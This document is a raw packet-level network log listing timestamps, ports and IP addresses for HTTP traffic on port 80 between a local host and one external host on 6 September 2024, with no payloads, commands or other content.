Sep 6, 2024 09:58:06.468969107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.468981981 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.468993902 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469006062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469010115 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469021082 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469039917 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469049931 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469074011 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469093084 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469400883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469434977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469451904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469464064 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469464064 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469475031 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469481945 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469489098 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469500065 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469501972 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469513893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.469530106 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.469547987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470163107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470175982 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470201969 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470213890 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470226049 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470232964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470243931 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470247030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470272064 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470276117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470297098 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470320940 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470812082 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470824957 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470839977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470861912 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470889091 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470901012 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470913887 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470925093 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470937967 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470951080 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.470957041 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.470992088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471013069 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471013069 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471029043 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471059084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471070051 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471080065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471110106 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471121073 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471137047 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471153975 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471165895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471178055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471189976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471206903 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471239090 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471674919 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471688032 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471703053 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471724033 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471729040 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471743107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471749067 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471756935 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471771002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471776009 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471792936 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471822023 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471848965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471859932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471872091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.471872091 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471905947 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471925020 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.471976995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472012043 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472023964 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472058058 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472074032 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472076893 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472088099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472107887 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472122908 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472507954 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472520113 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472558975 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472563028 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472570896 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472577095 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472583055 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472594976 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472598076 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472608089 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472637892 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472661972 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472842932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472856045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472871065 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472889900 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472914934 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.472974062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.472987890 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473001003 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473021984 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473032951 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473047972 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473051071 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473062992 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473073006 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473076105 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473093987 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473095894 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473112106 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473114967 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473131895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473136902 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473140001 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473162889 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473195076 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473397970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473426104 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473437071 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473448038 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473463058 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473479033 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473484993 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473496914 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473510027 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473517895 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473529100 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473541021 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473556042 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473576069 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473594904 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473604918 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473613977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473625898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473634005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473716021 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473728895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473740101 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473769903 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473769903 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473783016 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473795891 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473797083 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.473809958 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.473844051 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.504466057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504530907 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.504574060 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504589081 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504602909 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504615068 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504622936 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.504627943 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504640102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.504647017 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.504678965 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523000002 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523050070 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523067951 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523071051 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523076057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523078918 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523083925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523089886 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523096085 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523101091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523102999 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523124933 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523145914 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523154020 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523168087 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523189068 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523197889 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523204088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523216963 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523231030 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523241997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523247957 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523247957 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523255110 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.523271084 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523284912 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.523294926 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.559906960 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.559936047 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.559982061 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.559998035 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560009956 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560012102 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560023069 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560036898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560049057 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560060978 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560061932 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560071945 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560085058 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560086966 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560096979 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560106039 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560117006 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560125113 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560131073 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560151100 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560173988 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560440063 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560453892 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560467958 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560504913 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560518026 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560528994 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560542107 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560558081 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560569048 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560571909 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.560587883 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.560604095 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561060905 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561109066 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561167955 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561180115 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561192989 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561206102 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561218977 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561219931 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561233997 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561238050 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561268091 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561788082 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561827898 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561847925 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561872005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561899900 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561919928 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561930895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561943054 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561955929 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561966896 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.561969042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.561988115 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562062979 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562632084 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562673092 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562685013 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562736988 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562756062 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562777042 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562793970 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562797070 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562819958 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562820911 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562832117 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562835932 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562855005 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562855005 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562872887 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562874079 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562886000 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562891960 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562901020 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562907934 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562913895 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562927961 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562932014 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.562946081 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.562969923 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.563767910 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563781023 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563795090 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563807964 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.563823938 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.563838959 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.563924074 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563935995 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563949108 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563968897 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.563983917 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.563994884 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.563996077 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564007998 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564018965 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564019918 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564033031 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564038038 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564045906 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564064026 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564083099 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564083099 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564095020 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564105988 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564117908 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564126015 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564133883 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564145088 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564151049 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564158916 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564169884 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564182997 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564198971 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564205885 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564218998 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564218998 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564229965 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564240932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564244986 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564254045 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564260006 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564265013 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564276934 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564287901 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564287901 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564302921 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564304113 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564320087 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564347982 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.564805031 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.564846992 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565012932 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565025091 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565037012 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565048933 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565061092 CEST	49719	80	192.168.2.7	31.41.244.11
Sep 6, 2024 09:58:06.565064907 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565077066 CEST	80	49719	31.41.244.11	192.168.2.7
Sep 6, 2024 09:58:06.565090895 CEST	80	49719	31.41.244.11	192.168.2.7
